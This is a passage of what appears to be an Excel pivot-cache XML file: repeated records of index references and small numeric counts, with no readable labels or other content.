    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="13"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1208"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="11"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1209"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1210"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="25"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="35"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="20"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="150"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1211"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="13"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1212"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="60"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1213"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="28"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="56"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1214"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1215"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1216"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1217"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1218"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1219"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1220"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="98"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="50"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1221"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="11"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="8"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="38"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1227"/>
  </r>
  <r>
